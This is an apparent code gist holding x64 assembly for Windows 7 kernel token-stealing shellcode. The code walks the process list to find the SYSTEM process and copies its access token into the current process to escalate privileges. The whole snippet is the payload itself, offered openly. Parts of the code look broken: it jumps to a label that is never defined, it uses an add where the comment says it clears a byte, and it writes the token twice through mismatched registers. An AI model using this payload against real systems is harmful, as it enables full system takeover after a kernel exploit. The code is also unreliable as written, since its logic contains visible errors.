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Created June 4, 2020 06:09
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Windows 7 x64 Token Stealing Shellcode Stub for current process
PUBLIC get_token
get_token proc
;required register cleaning
; Get pointer to _EPROCESS Structure
xor rax, rax ; Set Zero
mov rax, gs:[rax + KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
mov rax, [rax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process
mov rcx, rax ; Copy current _EPROCESS structure
mov r8, rcx ; Store refernce point for token
add r8, 7 ; byte align
; Assign System PID
mov rdx, SYSTEM_PID ; 0x004
; GetSystemPID Loop Logic
; pprocess = current_process
; while pprocess->UniqueProcessId ! = SystemProcess->UniqueProcessId {
; pprocess = pprocess->Flink
; }
mov rax, [rax + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink
sub rax, FLINK_OFFSET ; Next Process
cmp[rax + Unique_PID], rdx ; Compare the Unique Process ID with 4
jne GetSystemPID
mov rdx, [rax + TOKEN] ; Copy SYSTEM process nt!_EPRCOESS -> Token
add rdx, 0f0h ; Nullify last byte of the token
or rdx, r8 ; Token Refernce Count
mov[rcx + TOKEN], rdx ; Copy token of system to current process
mov[ecx + TOKEN], edx ; Copy token of system to current process
; stack_alignment
get_token ENDP
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